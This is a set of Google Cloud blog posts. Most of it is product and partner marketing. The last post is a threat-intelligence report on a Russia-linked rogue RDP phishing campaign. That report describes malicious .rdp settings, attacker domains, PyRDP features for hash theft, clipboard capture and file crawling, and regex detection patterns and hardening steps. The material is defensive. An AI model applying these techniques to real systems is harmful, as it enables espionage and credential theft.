AI agents are a major leap from traditional automation or chatbots. They can execute complex workflows, from planning and research, to generating and testing novel ideas. But to scale, businesses need an AI-ready information ecosystem that can work across silos, easy ways to create and adopt agents, and enterprise-grade security and compliance.
That’s why we launched Google Agentspace in December. This product puts the latest Google foundation models, powerful agents, and actionable enterprise knowledge in the hands of employees. With Agentspace, employees and agents can find information from across their organization, synthesize and understand it with Gemini’s multimodal intelligence, and act on it with AI agents.
Since the launch, we have seen tremendous interest in Agentspace from leading organizations like Banco BV, Cohesity, Gordon Food Services, KPMG, Rubrik, Wells Fargo, and more.
We’re accelerating this momentum by expanding Agentspace, currently generally available via allowlist, to make creating and adopting agents simpler. Starting today, customers can:
Give employees access to Agentspace’s unified enterprise search, analysis, and synthesis capabilities, directly from the search box in Chrome
Discover and adopt agents quickly and easily with Agent Gallery, and create agents with our new no-code Agent Designer
Deploy Google-built agents such as our new Deep Research and Idea Generation agents to help employees generate and validate novel business ideas, synthesize dense information, and more
“We recently began our roll out of Google Agentspace to US employees at Gordon Food Service, with the goal of empowering them with greater access to our enterprise intelligence. This implementation has already started to transform how we access enterprise knowledge, wherever it is, as our searches are now grounded in our data across Google Workspace and other sources like ServiceNow. Employees are benefitting from easier access because they can search across multiple systems in one place, which translates to better decision-making, and less legwork to discover information. Ultimately, Agentspace will enhance both our internal operations and product development. enabling us to serve our customers better.” – Matt Jansen, Manager of Emerging Technology, Gordon Food Service.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e2a46141a60>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Unified agentic search, directly from search box in Chrome
Imagine being able to find any piece of information within the organization – whether that’s text, images, websites, audio, and video – with the ease and power of Google-quality search. That’s what we’re bringing to enterprises with Google’s AI-powered multimodal search capabilities in Agentspace, helping customers to find what they need, regardless of how – and where – it’s stored. Whether the right information resides in common work apps like Google Workspace, Microsoft 365, apps like Jira, Salesforce, or ServiceNow, or in content from the web, Agentspace breaks down silos and understands organizational context. By building an enterprise knowledge graph for each customer — connecting employees with their team, documents they have created, software and data they can access, and more — it helps turn disjointed content into actionable knowledge.
Starting today in preview, Agentspace is integrated with Chrome Enterprise, letting employees leverage Agentspace’s unified search capabilities right from the search box in Chrome. Bringing Agentspace directly into Chrome will help employees easily and securely find information, including data and resources, right within their existing workflows.
Find data within your existing workflows directly from the search box in Chrome
Fast, simple agent adoption and creation
Google Agentspace provides employees – no matter their technical expertise – with access to specialized agents connected to various enterprise systems, so employees can integrate agents into their workflows and priorities with ease. We’re introducing two new features to help employees adopt and create agents for their specific needs:
Agent Gallery, generally available with allowlist, gives employees a single view of available agents across the enterprise, including those from Google, internal teams, and partners — making agents easy to discover and use. Customers can choose agents published by partners in Google Cloud Marketplace, then enable them in Agent Gallery, adding to our agent ecosystem and options for customers.
Agent Designer, in preview with allowlist, is a no-code interface for creating custom agents that connect to enterprise data sources and automate or enhance everyday knowledge work tasks. This helps employees – even those with limited technical experience – create agents suited to their individual workflows and needs. Thanks to deep integration between our products, Agent Designer complements the deeper, developer-first approaches available in Vertex AI Agent Builder, and agents built in Vertex AI Agent Builder can be published to Agentspace.
Powerful new expert agents: Idea Generation agent and Deep Research agent
As part of the Agent Gallery launch, two new, Google-built expert agents will join the previously-available NotebookLM for Enterprise:
Deep Research agent, generally available with allowlist, explores complex topics on the employee’s behalf, synthesizing information across internal and external sources into comprehensive, easy-to-read reports — all with a single prompt.
Idea Generation agent, available in preview with allowlist, helps employees innovate by autonomously developing novel ideas in any domain, then evaluating them to find the best solutions via a competitive system inspired by the scientific method.
Create a multi-agent innovation session with Idea Generation agent
Beyond expert agents, Agentspace supports the new open Agent2Agent (A2A) Protocol, which is designed to let agents across different ecosystems communicate with each other. As the first hyperscaler to drive this initiative for the industry, we believe this protocol will be critical to support multi-agent communication by giving agents a common language – regardless of the framework or vendor they are built on. This allows developers to choose the tools and frameworks that best suit their needs.
Enterprise-grade data protections and security
Agentspace was built on the same secure Google infrastructure trusted by billions of people. It is enterprise-ready, so as agents collaborate with employees and access corporate data, security, monitoring, and other essential requirements remain at the forefront.
It lets customers scan systems for sensitive information, such as PHI or PII data, or confidential elements, then choose whether to block these assets from agents and search. It also provides role-based access controls, encryption with customer-managed keys, data residency guarantees, and more.
We’re also growing the AI Agent Marketplace, a dedicated section within Google Cloud Marketplace. Customers can easily browse and purchase AI agents from partners such as Accenture, Deloitte, and more. Enterprise admins can make these agents available within Agentspace for added productivity and innovation. The growing variety of options lets each employee build and manage a team of agents to help them work — and we look forward to more innovation in the months to come.
Get started with Google Agentspace
As the ability to adopt and customize agents becomes more essential, we’re ready to take this journey with you — and excited to see what you accomplish with Agentspace.
Envision a future where every customer interaction is not only seamless and personalized, but delivers enduring experiences that build brand loyalty.
Today, AI agents are already transforming the ways businesses engage with customers — including advanced conversational agents. In fact, these conversational AI agents are enabling new levels of hyper-personalized, multimodal conversations with customers, and it’s improving customer interactions across all touchpoints.
And this is just the beginning.
While deploying AI for customer service is not entirely new, traditional deployments were limited in their ability to deliver personalized customer experiences at scale. Google Cloud’s Customer Engagement Suite was created to address these gaps through an end-to-end AI customer experience application that’s built with Google’s planet-scale capacity, performance, and quality. Customer Engagement Suite allows customers to connect with your business across any channel — such as web, mobile, email or voice — offering a consistent, personalized experience wherever you connect.
Recently we announced new AI-enabled capabilities to the four products within the Customer Engagement Suite — Conversational Agents, Agent Assist, Conversational Insights, and Google Cloud Contact Center-as-a-Service.
The Conversational Agentsproduct, helps customers build virtual agents that provide self-service experiences for customer service needs. Today we are unveiling a completely revamped and powerful new product for building and running generative and agentic conversational agents. This next generation Conversational Agents product will enable teams to create highly interactive, enterprise-grade AI agents in just a few keystrokes.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e2a303998b0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
The next generation of Conversational Agents
The leading capabilities provided by the next generation of the product include:
Simplifying how AI agents are built: Building AI agents has traditionally required specialized technical expertise. The next generation of Conversational Agents will use the latest Gemini models and Agent Development Kit, along with a comprehensive suite of enterprise-grade features such as privacy controls and AI observability. These power a no-code console that enables even non-technical employees to build complex conversational AI agents that deliver exceptional customer experiences in just a few clicks.
Enabling highly engaging customer experiences: The latest Gemini models enable human-like, high-definition voices; a higher degree of comprehension; and the ability to understand emotions — which all can help AI agents adapt during conversations. The product also supports streaming video, so the agents can interpret and respond to what they see in real-time when shared from customer devices.
Automating work across operations: Earlier we introduced out-of-the-box connectors to provide easy integration with the most popular customer relationship management (CRM) systems, data sources, and business messaging platforms. With the next generation of Conversational Agents, enterprise users will have a variety of tools to interact and perform specific tasks, such as look up products, add to cart, and check out with their applications through API calls.
Over the last year, our portfolio of conversational AI agents and applications has helped companies enhance customer experiences and turn them into moments of brand loyalty, both within their customer service operations and beyond.
Verizon transforms customer experiences with Customer Engagement Suite
Verizon is transforming how they serve their more than 115 million wireless connections with the help of Customer Engagement Suite. Human assisted AI-powered agents have helped customers with a range of day-to-day tasks, in stores and over the phone.
Verizon’s Personal Research Assistant provides the company’s 28,000 customer care representatives with the information they need to answer a customer’s question instantly, and personalized for their unique needs. Able to answer 95% of questions, the Personal Research Assistant reduces the cognitive load so care representatives can focus on the customer, leading to faster and more satisfying resolutions.
“At Verizon, we’re focused on transforming every customer interaction into a moment of genuine connection,” said Sampath Sowmyanarayan, chief executive officer, Verizon Consumer Group. “Google’s Customer Engagement Suite allows us to deliver faster, more personalized service, significantly reducing call times and empowering our team to focus on what truly matters: our customers. This human in the loop technology is not just about ease and simplicity; it’s about building lasting loyalty through exceptional experiences.”
Wendy’s and MercedesBenz deliver exceptional conversational experiences with vertical AI agents
We are also helping companies deliver great customer experiences beyond the contact center — meeting customers where they are, whether it’s in-store, in vehicles, or on personal devices like smartphones. We do this by providing readily deployable vertical AI agents that address specific real-world use cases.
This includes, the Food Ordering AI Agent, which delivers accurate, consistent, multilingual experiences, and the Automotive AI Agent, which offers deeply personalized, in-vehicle experiences.
Wendy’s is expanding their FreshAI deployment across 24 states. This drive-thru ordering system uses our Food Ordering AI Agent to handle 50,000 orders daily, in multiple languages, with a 95% success rate.
MercedesBenz is providing advanced conversational capabilities, including conversational search and navigation in the new CLA series this year, by integrating our Automotive AI Agent into their MBUX Virtual Assistant.
Take the next step
Read more about how organizations of all sizes across all industries are transforming customer experience with Customer Engagement Suite in this recent blog.
Watch the Google NEXT keynote and join us at the AI in Action showcase for a live demonstration of the Conversational Agents.
Schedule a free consultation with Google’s AI specialists to identify specific use cases and applications that will help your organization deliver similar business impact results.
It’s an honor to announce the 2025 Google Cloud Partner of the Year winners!
It takes a lot to build great AI and cloud technology. Advancements and innovation come from collaboration, and Google Cloud has thousands of partners to make this happen. Among these, we’re excited to recognize dozens who take our work to the next level. These distinguished partners have demonstrated incredible dedication, innovation, and collaboration in delivering impactful solutions that drive success for our customers. Their contributions to the Google Cloud community are truly remarkable and deserve to be recognized.
Please join us in congratulating the winners in the following categories on their outstanding achievements.
Global
This award celebrates top global partners who exemplify excellence in their category, driving innovation and delivering industry-leading solutions with Google Cloud. With a customer-first approach, these partners have demonstrated outstanding leadership, impact, and commitment to transforming businesses worldwide.
Country
This award honors top partners who have demonstrated expertise in leveraging their services and solutions in their country or region to drive sales and deliver outstanding outcomes for Google Cloud customers.
Industry Solutions
Partners receiving this award have leveraged Google Cloud capabilities to create comprehensive and compelling solutions that made a significant impact in one or more industries across multiple regions.
Technology
This award recognizes partners who used a winning combination of Google Cloud technology in a specific technology segment to deliver innovative solutions and customer satisfaction.
Business Applications
Winners of this award have leveraged Google Cloud capabilities to create comprehensive and compelling technology solutions that made a significant impact in one industry across multiple regions.
Artificial Intelligence
This award recognizes partners who helped customers leverage generative AI in 2024 to achieve outstanding success through Google Cloud technology.
Data & Analytics
Partners receiving this award have expertly migrated or deployed new Google Cloud data analytics solutions to help customers extract actionable insights from their data, fueling business transformation.
Databases
This award recognizes partners who have successfully implemented and optimized Google Cloud’s database solutions, enabling their customers to manage data efficiently, securely, and at scale.
Google Workspace
This category honors partners who have excelled in driving sales and delivering outstanding services for Google Workspace, empowering customers with transformative solutions for collaboration and productivity.
Infrastructure Modernization
This award recognizes partners who have helped customers modernize their infrastructure by leveraging Google Cloud’s innovative solutions to increase agility, scalability, and cost-efficiency.
Public Sector
Winners of this award have provided exceptional service and enabled the success of their public sector customers by innovating, building, and delivering the right combination of solutions.
Security
This category honors partners who have effectively implemented Google Cloud’s security solutions, safeguarding their customers’ data and infrastructure from evolving threats.
Talent Development
Partners receiving this award have demonstrated a commitment to growing their team’s cloud skills through training, upskilling, and reskilling their workforce on leading-edge technology with Google Cloud certifications.
Training
Winners of this award have provided exceptional training services and enabled customer success by innovating, building, and delivering the right combination of Google Cloud solutions through learning.
Social Impact
This award recognizes partners who have demonstrated exceptional commitment to driving positive social impact through innovative solutions and initiatives within their organizations.
Once again, congratulations to our 2025 Google Cloud Partner of the Year winners. It’s our privilege to recognize you for all of the groundbreaking work that you do. We look forward to another future-defining year of innovation and collaboration in the cloud.
In October 2024, Google Threat Intelligence Group (GTIG) observed a novel phishing campaign targeting European government and military organizations that was attributed to a suspected Russia-nexus espionage actor we track as UNC5837. The campaign employed signed .rdp file attachments to establish Remote Desktop Protocol (RDP) connections from victims’ machines. Unlike typical RDP attacks focused on interactive sessions, this campaign creatively leveraged resource redirection (mapping victim file systems to the attacker servers) and RemoteApps (presenting attacker-controlled applications to victims). Evidence suggests this campaign may have involved the use of an RDP proxy tool like PyRDP to automate malicious activities like file exfiltration and clipboard capture. This technique has been previously dubbed as “Rogue RDP.”
The campaign likely enabled attackers to read victim drives, steal files, capture clipboard data (including passwords), and obtain victim environment variables. While we did not observe direct command execution on victim machines, the attackers could present deceptive applications for phishing or further compromise. The primary objective of the campaign appears to be espionage and file theft, though the full extent of the attacker’s capabilities remains uncertain. This campaign serves as a stark reminder of the security risks associated with obscure RDP functionalities, underscoring the importance of vigilance and proactive defense.
Introduction
Remote Desktop Protocol (RDP) is a legitimate Windows service that has been wellresearched by the security community. However, most of the security community’s existing research is focused on the adversarial use of RDP to control victim machines via interactive sessions.
This campaign included use of RDP that was not focused on interactive control of victim machines. Instead, adversaries leveraged two lesser-known features of the RDP protocol to present an application (the nature of which is currently unknown) and access victim resources. Given the low prevalence of this tactic, technique, and procedure (TTP) in previous reporting, we seek to explore the technical intricacies of adversary tradecraft abusing the following functionality of RDP:
RDP Property Files (.rdp configuration files)
Resource redirection (e.g. mapping victim file systems to the RDP server)
RemoteApps (i.e. displaying server-hosted applications to victim)
Additionally, we will shed light on PyRDP, an open-source RDP proxy tool that offers attractive automation capabilities to attacks of this nature.
By examining the intricacies of the tradecraft observed, we gain not only a better understanding of existing campaigns that have employed similar tradecraft, but of attacks that may employ these techniques in the future.
Campaign Operations
This campaign tracks a wave of suspected Russian espionage activity targeting European government and military organizations via widespread phishing. Google Threat Intelligence Group (GTIG) attributes this activity to a suspected Russia-nexus espionage actor group we refer to as UNC5837. The Computer Emergency Response Team of Ukraine (CERT-UA) reported this campaign on Oct. 29, 2024, noting the use of mass-distributed emails with.rdp file attachments among government agencies and other Ukrainian organizations. This campaign has also been documented by Microsoft, TrendMicro, and Amazon.
The phishing email in the campaign claimed to be part of a project in conjunction with Amazon, Microsoft, and the Ukrainian State Secure Communications and Information Security Agency. The email included a signed .rdp file attachment purporting to be an application relevant to the described project. Unlike more common phishing lures, the email explicitly stated no personal data was to be provided and if any errors occurred while running the attachment, to ignore it as an error report would be automatically generated.
Figure 1: Campaign email sample
Executing the signed attachment initiates an RDP connection from the victim’s machine. The attachment is signed with a Let’s Encrypt certificate issued to the domain the RDP connection is established with. The signed nature of the file bypasses the typical yellow warning banner, which could otherwise alert the user to a potential security risk. More information on signature-related characteristics of these files are covered in a later section.
The malicious .rdp configuration file specifies that, when executed, an RDP connection is initiated from the victim’s machine while granting the adversary read & write access to all victim drives and clipboard content. Additionally, it employs the RemoteApp feature, which presents a deceptive application titled “AWS Secure Storage Connection Stability Test” to the victim’s machine. This application, hosted on the attacker’s RDP server, masquerades as a locally installed program, concealing its true, potentially malicious nature. While the application’s exact purpose remains undetermined, it may have been used for phishing or to trick the user into taking action on their machine, thereby enabling further access to the victim’s machine.
Further analysis suggests the attacker may have used an RDP proxy tool like PyRDP (examined in later sections), which could automate malicious activities such as file exfiltration and clipboard capture, including potentially sensitive data like passwords. While we cannot confirm the use of an RDP proxy tool, the existence, ease of accessibility, and functionalities offered by such a tool make it an attractive option for this campaign. Regardless of whether such a tool was used or not, the tool is bound to the permissions granted by the RDP session. At the time of writing, we are not aware of an RDP proxy tool that exploits vulnerabilities in the RDP protocol, but rather gives enhanced control over the established connection.
The techniques seen in this campaign, combined with the complexity of how they interact with each other, make it tough for incident responders to assess the true impact to victim machines. Further, the number of artifacts left to perform post-mortem are relatively small, compared to other attack vectors. Because existing research on the topic is speculative regarding how much control an attacker has over the victim, we sought to dive deeper into the technical details of the technique components. While full modi operandi cannot be conclusively determined, UNC5837’s primary objective appears to be espionage and file stealing.
Deconstructing the Attack: A Deep Dive into RDP Techniques
Remote Desktop Protocol
The RDP is used for communication between the Terminal Server and Terminal Server Client. RDP works with the concept of “virtual channels” that are capable of carrying presentation data, keyboard/mouse activity, clipboard data, serial device information, and more. Given these capabilities, as an attack vector, RDP is commonly seen as a route for attackers in possession of valid victim credentials to gain full graphical user interface(GUI) access to a machine. However, the protocol supports other interesting capabilities that can facilitate less conventional attack techniques.
RDP Configuration Files
RDP has a number of properties that can be set to customize the behavior of a remote session (e.g., IP to connect to, display settings, certificate options). While most are familiar with configuring RDP sessions via a traditional GUI (mstsc.exe), these properties can also be defined in a configuration file with the .rdp extension which, when executed, achieves the same effect.
The following .rdp file was seen as an email attachment (SHA256): ba4d58f2c5903776fe47c92a0ec3297cc7b9c8fa16b3bf5f40b46242e7092b46
An excerpt of this .rdp file is displayed in Figure 3 with annotations describing some of the configuration settings.
When executed, this configuration file initiates an RDP connection to the malicious command-and-control (C2 or C&C) server eu-southeast-1-aws[.]govtr[.]cloud and redirects all drives, printers, COM ports, smart cards, WebAuthn requests (e.g., security key), clipboard, and point-of-sale (POS) devices to the C2 server.
The remoteapplicationmode parameter being set to 1 will switch the session from the “traditional” interactive GUI session to instead presenting the victim with only a part (application) of the RDP server. The RemoteApp, titled AWS Secure Storage Connection Stability Test v24091285697854, resides on the RDP server and is presented to the victim in a windowed popup. The icon used to represent this application (on the Windows taskbar for example) is defined by remoteapplicationicon. Windows environment variables %USERPROFILE%, %COMPUTERNAME%, and %USERDNSDOMAIN% are used as command-line arguments to the application. Due to the use of the property remoteapplicationexpandcmdline:i:0 , the Windows environment variables sent to the RDP server will be that of the client (aka victim), effectively performing initial reconnaissance upon connection.
Lastly, the signature property defines the encoded signature that signs the .rdp file. The signature used in this case was generated using Let’s Encrypt. Interestingly, the SSL certificate used to sign the file is issued for the domain the RDP connection is made to. For example, with SHA256: 1c1941b40718bf31ce190588beef9d941e217e6f64bd871f7aee921099a9d881.
Figure 4: Signature property within .rdp file
Tools like rdp_holiday can be used to decode the public certificate embedded within the file in Figure 4.
Figure 5: .rdp file parsed by rdp_holiday
The certificate is an SSL certificate issued for the domain the RDP connection is made to. This can be correlated with the RDP properties full_address / alternate_full_address.
alternate full address:s:eu-north-1-aws.ua-gov.cloud
full address:s:eu-north-1-aws.ua-gov.cloud
Figure 6: Remote Address RDP Proprties
.rdp files targeting other victims also exhibited similar certificate behavior.
In legitimate scenarios, an organization could sign RDP connections with SSL certificates tied to their organization’s certificate authority. Additionally, an organization could also disable execution of .rdp files from unsigned and unknown publishers. The corresponding GPO can be found under Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Connection Client -> Allow .rdp files from unknown publishers.
Figure 7: GPO policy for disabling unknown and unsigned .rdp file execution
The policy in Figure 7 can optionally further be coupled with the “Specify SHA1 Thumbprints of certificates representing trusted .rdp publishers” policy (within the same location) to add certificates as Trusted Publishers.
From an attacker’s perspective, existence of a signature allows the connection prompt to look less suspicious (i.e., without the usual yellow warning banner), as seen in Figure 8.
This RDP configuration approach is especially notable because it maps resources from both the adversary and victim machines:
This RemoteApp being presented resides on the adversary-controlled RDP server, not the client/victim machine.
The Windows environment variables are that of the client/victim that are forwarded to the RDP server as command-line arguments
Victim file system drives are forwarded and accessible as remote shares on the RDP server. Only the drives accessible to the victim-user initiating the RDP connection are accessible to the RDP server. The RDP server by default has the ability to read and write to the victim’s file system drives
Victim clipboard data is accessible to the RDP server. If the victim machine is running within a virtualized environment but shares its clipboard with the host machine in addition to the guest, the host’s clipboard will also be forwarded to the RDP server.
Keeping track of what activity happens on the victim and on the server in the case of an attacker-controlled RDP server helps assess the level of control the attacker has over the victim machine. A deeper understanding of the RDP protocol’s functionalities, particularly those related to resource redirection and RemoteApp execution, is crucial for analyzing tools like PyRDP. PyRDP operates within the defined parameters of the RDP protocol, leveraging its features rather than exploiting vulnerabilities. This makes understanding the nuances of RDP essential for comprehending PyRDP’s capabilities and potential impact.
More information on RDP parameters can be found here and here.
Resource Redirection
The campaign’s .rdp configuration file set several RDP session properties for the purpose of resource redirection.
RDP resource redirection enables the utilization of peripherals and devices connected to the local system within the remote desktop session, allowing access to resources such as:
Printers
Keyboards, mouse
Drives (hard drives, CD/DVD drives, etc.)
Serial ports
Hardware keys like Yubico (via smartcard and WebAuthn redirection)
Audio devices
Clipboards (for copy-pasting between local and remote systems)
Resource redirection in RDP is facilitated through Microsoft’s “virtual channels.” The communication happens via special RDP packets, called protocol data packets (PDU), that mirror changes between the victim and attacker machine as long as the connection is active. More information on virtual channels and PDU structures can be found in MS-RDPERP.
Typically, virtual channels employ encrypted communication streams. However, PyRDP is capable of capturing the initial RDP handshake sequences and hence decrypting the RDP communication streams.
Figure 9: Victim’s mapped-drives as seen on an attacker’s RDP server
Remote Programs / RemoteApps
RDP has an optional feature called RemoteApp programs, which are applications (RemoteApps) hosted on the remote server that behave like a windowed application on the client system, which in this case is a victim machine. This can make a malicious remote app seem like a local application to the victim machine without ever having to touch the victim machine’s disk.
Figure 10 is an example of the MS Paint application presented as a RemoteApp as seen by a test victim machine. The application does not exist on the victim machine but is presented to appear like a native application. Notice how there is no banner/top dock that indicates an RDP connection one would expect to see in an interactive session. The only indicator appears to be the RDP symbol on the taskbar.
Figure 10: RDP RemoteApp (MsPaint.exe) hosted on the RDP server, as seen on a test victim machine
All resources used by RemoteApp belong to that of the RDP server. Additionally, if victim drives are mapped to the RDP server, they are accessible by the RemoteApp as well.
PyRDP
While the use of a tool like PyRDP in this campaign cannot be confirmed, the automation capabilities it offers make it an attractive option worth diving deeper into. A closer look at PyRDP will illuminate how such a tool could be useful in this context.
PyRDP is an open-source, Python-based, man-in-the-middle (MiTM) RDP proxy toolkit designed for offensive engagements.
Figure 11: PyRDP as a MiTM tool
PyRDP operates by running on a host (MiTM server) and pointing it to a server running Windows RDP. Victims connect to the MiTM server with no indication of being connected to a relay server, while PyRDP seamlessly relays the connection to the final RDP server while providing enhanced capabilities over the connection, such as:
Stealing NTLM hashes of the credentials used to authenticate to the RDP server
Running commands on the RDP server after the user connects
Capturing the user’s clipboard
Enumerating mapped drives
Stream, record (video format), and session takeover
It’s important to note that, from our visibility, PyRDP does not exploit vulnerabilities or expose a new weakness. Instead, PyRDP gives granular control to the functionalities native to the RDP protocol.
Password Theft
PyRDP is capable of stealing passwords, regardless of whether Network Level Authentication (NLA) is enabled. In the case NLA is enabled, it will capture the NTLM hash via the NLA as seen in Figure 12. It does so by interrupting the original RDP connection sequence and completing part of it on its own, thereby allowing it to capture hashed credentials. The technique works in a similar way to Responder. More information about how PyRDP does this can be found here.
Figure 12: RDP server user NTLMv2 Hashes recorded by PyRDP during user authentication
Alternatively, if NLA is not enabled, PyRDP attempts to scan the codes it receives when a user tries to authenticate and convert them into virtual key codes, thereby “guessing” the supplied password. The authors of the tool refer to this as their “heuristic method” of detecting passwords.
Figure 13: Plaintext password detection without NLA
When the user authenticates to the RDP server, PyRDP captures these credentials used to login to the RDP server. In the event the RDP server is controlled by the adversary (e.g., in this campaign), this feature does not add much impact since the credentials captured belong to the actor-controlled RDP server. This capability becomes impactful, however, when an attacker attempts an MiTM attack where the end server is not owned by them.
It is worth noting that during setup, PyRDP allows credentials to be supplied by the attacker. These credentials are then used to authenticate to the RDP server. By doing so, the user does not need to be prompted for credentials and is directly presented with the RemoteApp instead. In the campaign, given that the username RDP property was empty, the RDP server was attacker-controlled, and the RemoteApp seemed to be core to the storyline of the operation, we suspect a tool like PyRDP was used to bypass the user authentication prompt to directly present the AWS Secure Storage Connection Stability Test v24091285697854 RemoteApp to the victim.
Finally, PyRDP automatically captures the RDP challenge during connection establishment. This enables RDP packets to be decrypted if raw network captures are available, revealing more granular details about the RDP session.
Command Execution
PyRDP allows for commands to be executed on the RDP server. However, it does not allow for command execution on the victim’s machine. At the time of deployment, commands to be executed can be supplied to PyRDP in the following ways:
MS-DOS (cmd.exe)
PowerShell commands
PowerShell scripts hosted on the PyRDP server file system
PyRDP executes the command by freezing/blocking the RDP session for a given amount of time, while the command executes in the background. To the user, it seems like the session froze. At the time of deploying the PyRDP MiTM server, the attacker specifies:
What command to execute (in one of the aforementioned three ways)
How long to block/freeze the user session for
How long the command will take to complete
PyRDP is capable of detecting user connections and disconnections to RDP sessions. However, it lacks the ability to detect user authentication to the RDP server. As a user may connect to an RDP session without immediately proceeding to account login, PyRDP cannot determine authentication status, thus requiring the attacker to estimate a waiting period following user connection (and preceding authentication) before executing commands. It also requires the attacker to define the duration for which the session is to be frozen during command execution, since PyRDP has no way of knowing when the command completes.
The example in Figure 14 relays incoming connections to an RDP server on 192.168.1.2. Upon connection, it then starts the calc.exe process on the RDP server 20 seconds after the user connects and freezes the user session for five seconds while the command executes.
A clever attacker can use this capability of PyRDP to plant malicious files on a redirected drive, even though it cannot directly run it on the victim machine. This could facilitate dropping malicious files in locations that allow for further persistent access (e.g., via DLL-sideloading, malware in startup locations). Defenders can hunt for this activity by monitoring file creations originating from mstsc.exe. We’ll dive deeper into practical detection strategies later in this post.
Clipboard Capture
PyRDP automatically captures the clipboard of the victim user for as long as the RDP connection is active. This is one point where the attacker’s control extends beyond the RDP server and onto the victim machine.
Note that if a user connects from a virtual environment (e.g., VMware) and the host machine’s clipboard is mapped to the virtual machine, it would also be forwarded to the RDP session. This can allow the attacker to capture clipboard content from the host and guest machine combined.
Scraping/Browsing Client Files
With file redirection enabled, PyRDP can crawl the target system and save all or specified folders to the MiTM server if instructed at setup using the --crawl option. If the --crawl option is not specified at setup, PyRDP will still capture files, but only those accessed by the user during the RDP session, such as environment files. During an active connection, an attacker can also connect to the live stream and freely browse the target system’s file system via the PyRDP-player GUI to download files (see Figure 15).
It is worth noting that while PyRDP does not explicitly present the ability to place files on the victim’s mapped drives, the RDP protocol itself does allow it. Should an adversary misuse that capability, it would be outside the scope of PyRDP.
Stream/Capture/Intercept RDP Sessions
PyRDP is capable of recording RDP sessions for later playback. An attacker can optionally stream each intercepted connection and thereafter connect to the stream port to interact with the live RDP connection. The attacker can also take control of the RDP server and perform actions on the target system. When an attacker takes control, the RDP connection hangs for the user, similar to when commands are executed when a user connects.
Streaming, if enabled with the -i option, defaults to TCP port 3000 (configurable). Live connections are streamed on a locally bound port, accessible via the included pyrdp-player script GUI. Upon completion of a connection, an .mp4 recording of the session can be produced by PyRDP.
This section focuses on collecting forensic information, hardening systems, and developing detections for RDP techniques used in the campaign.
Security detections detailed in this section are already integrated into the Google SecOps Enterprise+ platform. In addition, Google maintains similar proactive measures to protect Gmail and Google Workspace users.
Log Artifacts
Default Windows Machine
During testing, limited evidence was recovered on default Windows systems after drive redirection and RemoteApp interaction. In practice, it would be difficult to distinguish between a traditional RDP connection and one with drive redirection and/or RemoteApp usage on a default Windows system. From a forensic perspective, the following patterns are of moderate interest:
Creation of the following registry key upon connection, which gives insight into attacker server address and username used:
HKUS-1-5-21-4272539574-4060845865-869095189-1000SOFTWARE
MicrosoftTerminal Server ClientServers<attacker_IP_Address>
HKUS-1-5-21-4272539574-4060845865-869095189-1000SOFTWARE
MicrosoftTerminal Server ClientServers<attacker_server>UsernameHint:
"<username used for connection>"
The information contained in the Windows Event Logs (Microsoft-Windows-TerminalServices-RDPClient/Operational):
Event ID 1102: Logs attacker server IP address
Event ID 1027: Logs attacker server domain name
Event ID 1029: Logs username used to authenticate in format base64(sha256(username)).
Heightened Logging Windows Machine
With enhanced logging capabilities (e.g., Sysmon, Windows advanced audit logging, EDR), artifacts indicative of file write activity on the target system may be present. This was tested and validated using Sysmon file creation events (event ID 11).
Victim system drives can be mapped to the RDP server via RDP resource redirection, enabling both read and write operations. Tools such as PyRDP allow for crawling and downloading the entire file directory of the target system.
When files are written to the target system using RDP resource redirection, the originating process is observed to be C:Windowssystem32mstsc.exe. A retrospective analysis of a large set of representative data consisting of enhanced logs indicates that file write events originating from mstsc.exe are a common occurrence but display a pattern that could be excluded from alerting.
For example, multiple arbitrarily named terminal server-themed .tmp files following the regex pattern _TS[A-Z0-9]{4}.tmp(e.g., _TS4F12.tmp) are written to the user’s %APPDATA%/Local/Temp directory throughout the duration of the connection.
Additionally, several file writes and folder creations related to the protocol occur in the %APPDATA%/LocalMicrosoftTerminal Server Client directory.
Depending upon the RDP session, excluding these protocol-specific file writes could help manage the number of events to triage and spot potentially interesting ones. It’s worth noting that the Windows system by default will delete temporary folders from the remote computer upon logoff. This does not apply to the file operations on redirected drives.
Should file read activity be enabled, mstsc.exe-originating file reads could warrant suspicion. It is worth noting that file-read events by nature are noisy due to the way the Windows subsystem operates. Caution should be taken before enabling it.
.rdp File via Email
The .rdp configuration file within the campaign was observed being sent as an email attachment. While it’s not uncommon for IT administrators to send .rdp files over email, the presence of an external address in the attachment may be an indicator of compromise. The following regex patterns, when run against an organization’s file creation events, can indicate .rdp files being run directly from Outlook email attachments:
/\AppData\Local\Microsoft\Windows\(INetCache|Temporary Internet Files)
\Content.Outlook\[A-Z0-9]{8}\[^\]{1,255}.rdp$/
/\AppData\Local\Packages\Microsoft.Outlook_[a-zA-Z0-9]{1,50}\.{0,120}
\[^\]{1,80}.rdp$/
/\AppData\Local\Microsoft\Olk\Attachments\([^\]{1,50}\){0,5}[^\]
{1,80}.rdp$/
System Hardening
The following options could assist with hardening enterprise environments against RDP attack techniques.
Network-level blocking of outgoing RDP traffic to public IP addresses
Disable resource redirection via the Registry
Key: HKEY_LOCAL_MACHINESoftwareMicrosoftTerminal Server Client
Allow .rdp files from unknown publishers: Setting this to disable will not allow users to run unsigned .rdp files as well as ones from untrusted publishers.
Specify SHA1 Thumbprints of certificates representing trusted .rdp publishers: A way to add certificate SHA1s as trusted file publishers
Computer Configuration -> Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Session Host: Policies on enable/disabling
Resource redirection
Clipboard redirection
Forcing Network Level Authentication
Time limits for active/idle connections
Blocking .rdp file extension as email attachments
The applicability of these measures is subject to the nature of activity within a given environment and what is considered “normal” behavior.
YARA Rules
These YARA rules can be used to detect suspicious RDP configuration files that enable resource redirection and RemoteApps.
